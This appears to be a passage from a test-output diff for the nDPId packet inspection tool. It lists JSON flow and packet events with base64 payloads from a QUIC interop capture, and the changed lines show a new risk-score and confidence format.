 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1603816434784,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434784,"pkt":"pJGxgjQ5PKn0qB\/sht1gCAvlBNgRQCABCwcKydWupNP+R2kegH0qBdAYDOmBAM0q4v2zvsWrrj0RUgTYFNnOCgoKCgghNSPe1nPIHwAARL5EcEFiriZrD+ET8JYIbR9oI0xm+rhrvJqfLILgs8D3Ue0qQNbVhIpNUU0tlgUCj3R+EB0BmYAvw6bLa5fuluEc0rN9r82heJLvapv7VUF9l51pFcem49jTWjYnj2oS6+waPQZXW+lgdvo6kQGqK89XfdzR1PgUM0aNtvz7T3DIGxshf8Bt0Mg12xV8BKvDf+WpUoRZwtsOWK2raSvEzJiBDtp9+7hN2cxP9JSjYr8Ymo+djN+4mxQxt78BMIwseR0wrK25i\/FCRyQZdy2RkGo1CRXgmyDAvyZwFE4TbrzLF307bQj1syPR3dOu7kPw5RNRQT+t3L+8NYL3mVwzg8kMaSuoFMxCZQvln3VAPeh3OJLvvw5+EMXFzx9zqWLfnKXdAHEumvxqEmlR\/1Fx5dKWAiLy4VEiB68pm8cbRcxMeWpZLJsU99vTYR1NQ7ym2LdsdYmsLFkMBHZj6r8XWpZpYhelGHgVf6dBgfvJoDoveKLzHHW7IQW0Q3CRZrurV397BZfMCs6JGA+7vvWU+gtIQ6+afCAD2BGOodmj\/NZoYjSTSz7UleFuiy\/Vh89Rle0L+paWGt8DSK3GtOoMd1TE8\/cyKXC0DuFP7OI\/tvNCsVqyrqekypnTROZiw\/hHDf4fjDoJUlr9W1Nwoksz+NUOe+agaP03VJPXO6c8eR1g16+4NUIoRiQvQ0PsA7\/u1\/P3EtbO6kdIsAPEzJh9T\/vDsjetpZCO9B\/5U78SmuNIpzUeyMa0pZ3WKYxs\/S8iP30dyOyRmNpGcQ2OhBlF2DpsSjXyEdMu816faZPTNRUFFFKzjtvsO4TkLkupS4QKX8ZqjlbPKIDbq7pJvPq1yQvdi8dyUb+GRdEu83F1kTyqMVj3VhOrCFJc0NwPk0QIQVaRiHCaQM\/M\/CAEON1vbjPSs5TR\/CU4ctB4lWQERooxF86Jf+vt4BRo+E+RBZpGyY9TSyW8BYhtJJUh4WEUdOJYaaV9TsJb\/JsQlajq3H+ad6FKE+sN0lRn0vyD+XLhK8WIG31ajHwqBioHhepDDhLwoYsiq3DO2TeKvxXp\/qbpXpHbmWZzrHqrW57rxAic64eJNK8nbylzcqNgf8E5i4dPbpF2trFKH9Xo28gQRRftLrNFAzIkDO4sN7G\/s0Kd5rqq+U4C+5hUgd+K5TPBViJ0+ZA5X+DO59wdV3YWk6fe3rpcJwZqkWMTHB+M4lLppO\/yNE76E8Kr\/Uqw7z2y9O2Hv+NvCttG9qY2iyEqocZxBUTD+UcJwLZ5GMkOh04nY5cKAEPxYCG+ZT+E6zrOvBnQQZqy8s3d7C7XsImaGAvBZu0AsMYvrJw6+l+x2h42qzLWSCCzqB8YHNMAoyjY5EEPiHDB4aqsw+AvUgp3kmejvZBqsLkmz4XspOgx4+v9KHKqq4bc+dtdIyTgZmNbhwtVFRrJwGMGlIJO3dYTW+eFWTrmyY\/kU+ejjmIORkV0nipRgOem0UmubxMEgQZJeGXrQKTimh1Z9tS70mAbbB\/uGZjC6Urq2uLNfRgZdNhSsyCMoYQw8molzzh2Na0ZIW7YN2Gu\/\/Rf\/n13siixEZmXrzTIF7wcraimRKQ6DvgjgbL2hCWeF8mCngEFXTnoVA=="}
-00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434784,"flow_last_seen":1603816434784,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434784,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434784,"flow_last_seen":1603816434784,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434784,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 02149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1603816434792,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434792,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAJ7ZAAEAR9yfAqAGAhfLO9KXYAbsE7LC9xgoKCgoI+QsGqtFYjA8AAETSGVf3NpHzKNMNdfh\/V\/noLzrrCJTWCW2izc6gcn2txyrZ3vTYFw9oti5N5Zd0a4DdA1cWLhNby0WoxjcoN3uUL31I6AuWTRtQmld72DVp1nFbW14vxWrhBIu4agIQU6NycrkwLEV1tOoKdYlrthTNMwD3M+k5+y\/jdMVtkD0R0YQR7BZOnM3kTX1bH0f\/eldh4oH8S4GerrQ\/hVn\/PHliyMbE95mBKeNH\/XBKjPaVH4SE5iyuZ4o0cAJX6zKU4lajsV6QVuEgsemLtfWCChsdFvaI+RSAzByJ2Y7eGCh7v+Gh4DXflSFSrZUSBAmTZoA0Zou6ukZtsJNjsWY68k6WygqpiwhMQJreLyjeXVzk7oyGDwHO\/hAvmg6xY5GXfBPf0ls2P2OW7n3w7L66S3D+as25Ka5fB\/1n04+oJmaw3ADdYqeBwRa3iSrQ7F7kK3NaNAJNRq2zS4fr\/b+ubURvNfR5staBQwIu\/o7Zb5+LwmaF9rZXHBu2Tz+8wv0lj8mhBUzLNtcfw27CNl1txh1+lvdEzBQ0+1QdwfOwk\/hlq7\/lf8GrfqmLhlEPTaPG7AFa3IPuxLh84mmZwaTAXQbxug33HwUz22AWbGI9PCbve31PjWm1LgNNd+7+kMpoKF52auR5lPAUr8zA5LwEBGR1mQkQ7NprWlORnGh5UWqvkJJHwL2k2IRTag51mGTH5MB1+cfSjVWNAtd\/8JuYCSBC+KNhtmuCXomT7rLvgXGj6o1sphXx4atNA9Dn9q1FcbinWgv+WKWZhnHGGP6dn+mrWu\/7bvpjXjrtDgIw7CyPxH34BjhKbxZ7QcB83XEhpxelpCRa6WUEloOBWGYIeMG0gZJIKjNZe0ll5C9J5n2Eq3sqg9KP3L2k8K+5dmEqspUGb1NUPPi+n6\/iFHU1fhMvh64hs66vVu1aXgLA9dFfJPSu+8U4SVAQ9LQIkLt1yLRcKmzv7K8F\/1wJz\/\/VA0FnXA\/S3tZfKvHD4A\/\/6XZ0e0JKAMn5kSF7uTeS5e5gdjg52fvbQjQd6m1d25cld76mtRwuKWprxy2fwcaEL3Y3Vh5fKfWjC4aclIK\/BmtRNjMNgHLI8jT0sKKwQDoyu6Dl2oMw70Jg67MXwUeukQTS75rXVHrbzUA2pmGH7aReYW35h4TyF+C9spNA\/zEJJt\/SQ8ZE+FX35GC6kc6V2qla+i+Pq5C7DccKCdXqXuLKAqiNDsgQzxhbb58C67FdYeSem4xijEQ544+5VsmSgDw5Bm+f8kn5ITiUXjSnERiDrW8LMlRKSAtIBNf8TTQIdO73pxNtEY6ZK+aCZSZfuGLY5fcX7OoNql4qaH5tgUcAKTmfbm2Rny2woTB6j6YC1lH0CTq+8yvsMUtLcbQZpIVgD2w91k\/DHu\/rqh55qa43XObRLAN1Cas7QHa1faPFa7Kyh\/Dx\/uu2xJFLfWHVfeKsvw4nX\/4k2v0Isffs\/nVZE\/mcAdyEmoN0MJ38PQMKNvx6iNUa45euWiJAQh0n\/9FPVkaW3p\/pu55m0RYAv15pyglEYDeOzb9cgqoBOBFbL5F17NfFlR1TUtETcnCdxPpozDGGzr8327bzSnjwgFfcwdPtJKYxjWOqhjxgehtiPwt9WJP1lnTBRJMRI29aK4qFwi9tCw=="}
 02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1603816434794,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434794,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAVgBAAEARrFHAqAGAR8opqcRxEVIE7DJpzAoKCgoIvbmHXcmpQ\/MAAETSE2e30YHkAX2XVfEpCGfOjyF840fDKozk89FYV10qOipSbcKfBwadYKaP2PDi2A7GqANLJXLXd1Ra2Q\/d2lyOKDnoc8x8gM9WzcPPQTUPx43cTsdSrSCDxUnpnuaj6yGd2N3XRIkY0gYWRPuFX7h\/fh1NFO2iAOlIL6UUnbjkaQBPj5+DK9Tkt1jAUKuz5C\/VX5NyeiPZztoZxmFEUkRFMohO0yR1d9jvsEZjpJxu1T2xxVadymVUvn+nPUj7gyxMFoi5gdzyUkI6qww5VGYT9o89cKQc7vz3RQ1j5HNSltr8teBgazRyqIezFwRxXQZzC0mfyCRRks8zmpYilpgAUrd6iKSrwI8xpH1mLLYEiIEokh7Nku+MJsQdaeXhqFHBdzmvpP2d5lWx83GgFuE+Dkn\/A4rNg8OLbx8Hd749+SlXxx2p\/3FSVDsm0u8FwDQ0TGJxo01kEWYz07BfKbG+vmnmpdKMZ0c+mcf5\/mMTkSlmCtsSWEbhtyGBpHj6Gp3P\/PHHW6qpxotr0bYpBtsptMaDfY0LOv36qEIsdtyoyFrcuYBfxE2rbRJIu0Oe5vS9+mDEauvlYu+hTOBWRYf3GYbB3IuMocvdH3ge3fFDDBDMar6Z4AzQD3wB4++BlRSMJ4Op1PtaLNuhvgHr+zWIE03DBlRJ+VplDnanX09JNXhTwH3H+AjPz1EvGjgEK6+YfNJQaFV7U9mDD9Ruthi3HVvk8\/fOat3XDJUwyHcciWPLz4ceNf3L7rSem0SlSz\/9sPlFDV+6MnWDTjz2MgYr10nBv91OfLa6dUBNOUc77cMVlTY946uEOebqDqBU6HTwpDrQQPOhfekx\/cwyHgX1SPiQ2jm0cco9gMyY\/biNH5Ae0kYwjthPOjVJSM3sD8k6twZNkrRaDgELJdCga8uI83ZLsJc3njlrx+9GoCKhJeSUcJrXmCVv5wqbYrzBtzlNPONszxo+vENua67+NrZXgrgkQf3D5vueityfehPXawW3uctYARfHo8es3+9km4o77SaJb+CNNegl3uhaafpl6DgQ+IXvsGebd9bGzfvvtGEjqvC8yYEyCoMopVY8b6KF028XUOHjcIIrxB9oRWGWX1t6qcAtpr5\/re1at\/9am5lVA7Gd9Xl3d+sVGUgFor51U\/E91\/+E5M5Qa008RYdjk8bxHdEi5qflOIKkQWLgH2ptDuy4K34mY60YaJX9MzZJHqAGBiOJyz2vC72RgiQqDDvCwlaJzHF+wCxLSno3fJNj+SzLPPJvdkMYQcGDVNBzW9gLntYHCPYZmwYktaxLJE5kbFfSUHtFwGEgRhMzIViDRf0rfOdiTfn8q1XUwHnBs2i86bgzg+ASxD5k9QGSx0i6DQMqkcfTxkRGAof6BOxVRYc9567BYEdhO\/\/6PdEmvCY3IgYkogHWhz0bGjMlwbJhFZn0\/rOkfEZRLdzHN3yIdh4NhKhCdUPWLn5T0v7ILIVw+5EDKoGAZZ6+44v3WJA9M5YTPJa8YeOn2nx3N3YEQRsjiBBWJmbxBrqvM2C\/FaZgvmTqe758ClWLW0UAseHM27RoZnUVhDYxYjRpjAi\/X3AjK7Y7RKIDkLHbl2y5Bqku+ZBD8\/fxJnSy0Fo82DtOYzY3K0yqjhL16Ji16juysw=="}
 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1603816434802,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"ts_msec":1603816434802,"pkt":"PKn0qB\/spJGxgjQ5ht1gDen3ACMRMCABSAB4FwEBvnZO\/\/4EYx0gAQsHCsnVrqTT\/kdpHoB9EVLCfAAjD9qPAAAAAAAIIsGdLtPZLyX\/AAAd\/wAAGxoqOko="}
 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434806,"flow_last_seen":1603816434806,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434806,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 01181{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1603816434806,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"ts_msec":1603816434806,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJA3rwAADIBPo3K7txcwKgBgAMDrQAAAAAARQAFAOUCQAAtEfp2wKgBgMru3FyV3hFRBOy8bMIKCgoKCDeSrwfZ37epAABE0hxlYo43miI9fcBT4NXlNvUyuqRzjALgZuz5ZEFwqFAJHCLIyiKMek3pvG1TfFtz+5dPcMlRmn1CpjYaJxtvjy1D8CXnaCGG32gK7yv0bsGVDyQR4j6nJT4\/BgeG5XzS2QksROzvNGVoOiM5mh9Gcivemi\/Ltw3i6ZMLxPmYmJjzRy5MQrmw7yWShK3Q0gjXLf\/AtAzYy4CwwNnnbu4HeZWuRph4yFsqigrFQzQiWW5R3FQS9VXQNOqcmpoWiLrZR6ybbeDMER5x2lrIuMbSZiBdtZBwZCB3UjQ8D6WXWUDqOreiLaatWU6Uu1Td\/atS+bPWsWkMIdZrEKUJ78RDCkU46YaC6J9gteAdBR7kDvpyMncXYbFq+wnVLl7bEkkrsFjuC3evFwokMfctXgYgQAfhg9lrv5W\/V8C8b+SLLGJ1OLOrQb7nrBWiHG6ErtKg2rmOgmj5TlcyL7QCWDLLcB4wY4DlINVS1W1uHvEQAamMqwBYJNWP\/j7R3\/z2LLwmYTggeZKmyJokcN4daQ+u2GrxKAd9n8ootJ6q14bjsfNDrGHdfa2X78HqV8e67EzuwM679YHyVDVcjdxmRT1W7vvW2odG2VW9n2hGz7F7x1SewA4VbmCgaMBt\/706B\/PIDrHOTJjIgOwT5HqHFLiW3qe6lZFlcg8="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434806,"flow_last_seen":1603816434806,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434806,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.598216}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434806,"flow_last_seen":1603816434806,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434806,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.598216}
 01190{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1603816434806,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"ts_msec":1603816434806,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJA9\/UAAC0BNJ8znmliwKgBgAMK13gAAAAARQAFAGANQAAwEYa3wKgBgDOeaWKq1xFSBOwXccwKCgoKCNp6o2ufRw8jAABE0iMFIf440snHtaQbpLTAJ\/\/X0Fab87I\/F+H+s8yGuc1DMj7IRCVccfx4Cactg6LpwLVqjp+zMpHzZNYgE+iBS5eSSQ5R1VIB3pIpWgR10BZu4jbgQ9OaBdQdBe6vEK8fOHQlW4z6tk88yOBPCZ9MOnhihM498wDmMjf47XEsFDB\/7XQLydimXkVgGcIAWfjRxaXaSbJMTKKvAYms0ejZnQnA1ViSWn1r\/yep9jMB4Ha216Bw+8\/bwb+zk8NWbJkU1joIp6LywbS8BKMNdkB8CvtxCpRm+uw4pI4+h7Ir2vhBxo8l109zWnww9jHcvrRJCAiVTzHX0IEoiynIkV5hfnomioZ+rfmWQ18DCMdbTm0g8xPqOvlcFJ4riKg6eD9T\/06FbQ\/gfMez3fH3QaSeBi2r\/TOHCN1q7d2RWFd\/zfCVFlJ5yK8kQ\/oLJ\/FOsWcUoocGzw5wDW2ZJKlMLUQVjXb6yA+tyXiZShAlzoYqYN0T4FvgLVOww\/BRgkMCtO+yhyv+IhNBUZ7HwVrODYj2Fkrg4imzgs1D4nwXIka\/LTCNZAzA2HaoTn\/7dnEMFUXWjYgl6Vcr7VmuvChO2Lk2W46SOWZvSzgpXd4SdNTImeyxURq7mYLuukLenDSue9Jo+fNHodI6Y4FhBpA6\/I5BPKpcZmf\/iYU="}
 02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1603816434806,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434806,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAlgRAAEARiNnAqAGAhfLO9LMfEVIE7M5rxAoKCgoIJ05Q063kdsUAAETSbVS8wmTCayioaeEDJ0E7Ag7cjypWJklnY03J30b1mdxIVOpIcCjzHgeNDAUeVGYchax6RLhjbFwwP3C\/qxh1OO8O83qldI1OYg6x3GPEV9dhbYkGdVcPi3mfVEvzh3eS8WnvbGq3a4H9q5E9mDKl7buMufgYFu2sl2hZ01ag0mTo116H4e6bMaTreq2mI8kmjdhWNv55TN2Tbo0qvafHS0QviZ2QSLwEnQh4J+FGfyqh3grvQtfWOnpdR8XEyF6DDe7LL\/KlLa4NwBuxumU\/mO\/SIZ8t8LmkA6HXglfpy4tEgA4X4H4bW8fdrEeEGZwPR7eDrKq9RqBC5oKz7o\/7sHblT4DHTu2jye83jOCQIrWBGQDr5qMowkCj2D+qE7I8qnehPTO3H56afZrW0y49JxTPEZjoHsKNr9nvjAleyeYuaG86WZoQwGHWl1q\/do2IozVSEZwB4ZhhqabxXQE\/bLsaV5zpA9VarwnHFfuqnigS8SW0VNHxqwF42AsxDhJ1ZhApy7feoO0PJvvB2oMY1tQHPKfitH7JeAITAfnhaBY2YdONDcZk5oBrPbcpcIaGvU\/fGwgBQ3eir6s7iNWqBonZzNxwiJDZOCaLqzesvSlVLwJWfVmI2gbBdEGORyuW8xbxQbWWWdwZ2ECu1W5iPFYWZNmDQ5+p+xP+v2p\/q9Zri2SEgtxNFAlFqBgYJSEcW+nfhelld\/8X+b4MFcnpWATco0d+cUaZqJ4oe\/SV5lTkb+r+kBl4Fi8vLnITjPgbX+wBQtuHCeIhIpPSGbKfX0e3KDUQANebIeZRTrYcajrn1fFRlg2x0mgRQZE3eh9zOE\/6NevPmRKd3whKrB4OrWwNw\/SlNsbpFrYxTvS9sFHtHn\/Uuh9Itnw6lb7ILr8jkDVyk4MOLQUBCbcYUCUwkQa6hAPdxDGJGAORwPlVdN1voToAmZpSEQkdedqob3cIiQWZE5mZWy5zSP4b+LhOHf9ORwzuNzfdlhFMGkZsYkTm4i9Glf9wL0Xp7g4iBWo1g\/ERgUa+jz9aU\/5pM9Q2WKNxTb0oWtxniWBS8Lxmsp0IiDMHvpKQ3FN7FMkHusFent8sdfLu8GN0db\/htJ0tYyNHKrn+\/ukQfcuGZu1CZ8pcapnxZCaWzdysytGbuUF0sN2\/rXvBKbrUoGOi\/yQYHoSWzZe4tWPuiFsnEL3ZfeQW8rimwLD7SocitIb0a8vtHdDj\/GmOBVkGDMBGCNjj8XxF6Z2FQBo+4oYwGZuGhSsfMXRlNNFIfFsIHDW9OAdCunv3+x5JsDNF8ukUbcH9anX6B8hHXxQel+qabQ+aJWYsgcN\/hIaoFyjxqHkiZZ0o818BWeuCXCM0HKhfsQvXHf4ucJSBS8pc2EzJ5EUcQ\/dllBKRQbIrXCSSmkQFN4Gab363GSeUDA3rD\/GBoK5b27D4o8WAAnT3izN4JAXB+H9hgMX9A0cMJMRRasU585OfR07ntlSr7v2dExw66EL\/j1gd3QFNGbnOWToZJQicIfGV\/RtMUnXQYizsWgjoqWOPbw2wWrCqJhhbkxH+WHFJq0Mlwe32rpddmRI7+CtcRWBotdeJJ3xxfL7AYrxPw3cctN1iTAucOHdUCyCwYu\/wN2z2Li9nrj7J9G4sQVWMiuNy4Q=="}
 02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1603816434812,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434812,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAqqBAAEAR4XfAqAGAKHC\/PNIfEVIE7NGPyAoKCgoIcBuNCNTaAX0AAETSdrPs58Nd4whderbUQKKE9lqbT2Q5dWXTzCU30Nuk49rwMOYzrP9hqurmfQzCfogq7GSDP2MPa19fV3S+tzaflHzUKhrCPd4WQ1zA7H6cNQz\/lRUSpnQOWA0uQAhhAk+IZiglMuTPFh7AnCe7BzheAkGio7m9ekHUnqgl2NpmpwBBQY2oKhqJXzck7whQvip39IREDqyYyokoeQbGf08lhmJrRyewd07SbXyZCbXrujwWAH9r0NguWbmeWQiWcLTQKzzy4g6sxprDxKvBtQqoDYhvf3TyqAO0JNQb6gL5PnsCQpPHeNU738v6N2EJwaCYld1aJc1nCH2E7UBhR1ArdPBQvdD2ti3qSdfkpRxzBao2iX1sHBqDyALe5QD\/8T0uZDT7mlUSPcUSCQVDdwUfo1H5Gw1rANt1KrnL+D7EeJEt30JdQogzd+25oyRRh\/N33koVbRPkvhHtyEiSOAqUcF2k5Cww7VSNAXDrSWJ3nfwrxyNNGcTk1vbfU9FQjS7xTsCs1DcL3tIwTh\/F\/WqE0Qefzo3L9DVZUBF95w+x+NrXTVfTMFyerU2W9IiTbdFPifHfNydqoB4UA6KdAkF420byZMA9uYn1eronWwg6zZLfNiMThXS7INZHCSmquoQM48twpJMiC8QLa2BKxvBs5MAXCaES3COreo36bEsm9T7MBNPrIFP83x9oS3Dwv962KtUHkL2c7dl+XXAGkrol0zp9I4duf7jIdkEwKt6bINytvQ7NOpnpqMe2V\/od99AzLNPugOYXhVlxSXXrKEIlIoBOH\/vFhTYqHBMHhKDUlY83Lqn6rlae+5ldEt\/PYxQqh9RlSvlTKizFbfa1Pqv6mluoxnZYLP\/Q1ytoMX++Rq54VSapX63zxer6E2Fc0D7Z6VXClsXzgGzvHubNlFS8CT4jYJOejwFK\/O29QfOBILbMoFfrRtMOMvJfvtl8oUyriiHZ+EYZfkq6QJnQfCI7a6a+eQggExHpUAScmRSiTG+IYeca3pfV6WTNGjJdxkNLPzA1Z5SNnLP6zTKrtTQschUTrKbBMGzeDxKanuLhkyCaGkNHJ+E9jo1kVSKyouGn1Xz0RovKIuTZdoKvIiFgJRBRTx8b8VxdFjPJBtQkuwYKYuNAT\/hv6yiy\/pQHRSFz+yZmlAIEJ6DuwyjItKkBePqNsaDsx8Am8smaYhsjEC8vmWFe5WEi20pG0HiVg5O5kSIY5y\/ziwUKkKhqlYGirFSKeTAYJVJpGBDrmIOk\/QXL5fYdpveFiq0l+piS3JuL7TGHxf5NvUDjc8PuuHAyslhM7YLSZqEKmlqBzNKi4Z+4Im8\/q3Qs2A9hPYC\/n9KxnKOeVVg7MxmNr3suDiWJ08nJtK7eU\/3Dvj\/ONoqM5exqmHYkJmeB\/i3BYkfgX807asMnZtideGvH\/mPNTuLBycK5oBic1paBSf3T6UKDwFomFMK4zRvQ2RTDSsREhwoKBAz9DUi22uSOarNzx4IBJQAnBsKlI7YkUFuQf2bHXLeTlc3sjH22aTbkcpuNQVPhD3jsXLo+uLTFSabB0ejUHrkQJu7N55kc5Hjl\/l+it9+skmXrEhRgrnh+Crc2M75SVQkMGW4nqifvwIUFkprpgBKS3scwqrMQ4XMu9+qfHYRTYA=="}
 02132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1603816434815,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434815,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAv\/VAAEAR567AqAGAwb4KYuh7EVIE7CoKxAoKCgoIhDOd38iF14kAAETSuj\/6PpYLanmhufRbzBfIfJWqpHveuI64\/eSlK93oC4y6GPXD69PeaFagOPTyFkLIpcEu43y7OCQ1Z35Isk5hak2XHZkMptd7KrQ0EFnJR20xJ\/8s4Hh47hOyrjz0Tb8KAyxJMBwDu01llmEO1Z0EcUEdsorSKLQ\/VLYtmHdEq54kYxwJK6cbambFBrjQfMNHN\/UVp0rFqJczDmgAC1L2e2MT22BlqqRvoo0urlHqeJYQ0fzf9Ma12psTRriGSLqomnfjAnDrYcUuJXKUNEdXIMo0IvCKK8Z2qE53aAwCfpEoAKMk5gq0fRGK85o3RF+aZZt44gpgPnPnQ3e3amJGJyTfNiB0r1\/n8TxhrJAQSkdTnqq4YW8ifhktYPIg4kTB2ijlN5mXKs6fM7HXB7edk1jJ2vRSPS\/Sd1iJC6K7IVGG+b05Hvoqeh26GxYLnmUShKxodNsm5bqP4KQTECZRHJGO5bC3iH2e9AmHFRtcJuV0TEnymRBdJso15Mw5WSKs6MiqZOUVTNhH\/pBSIvkiB59cpoQ2kryiNnrZYHeBm0GW1xHBJINLpHgWU+YOcS01DrnAzJKiAR++TsJqZLlDgEWdgltoevZ9gIp62LQq23k1aN8sOGWxJHB6SR2oFKCim70PXdVeVV2H14toHpbqvnGJ5OQ5TAo9F8H1kILTASoi7zMbCXU+ihgxAsvPHQ0ma57WHD5eEfq+qwnIiOkWrwxRNyE378pWGBYwI8oYScRtd2e51pW5YbrsHNUZOF1BRwr4kRNdeYmvBnBCWqp1oBtltIzrn\/Gfcg3DcXmKdv+wNqmSl5ckBYOsYJvjs7+A0lZkaQsFSCJS6cHnp21uzZtbu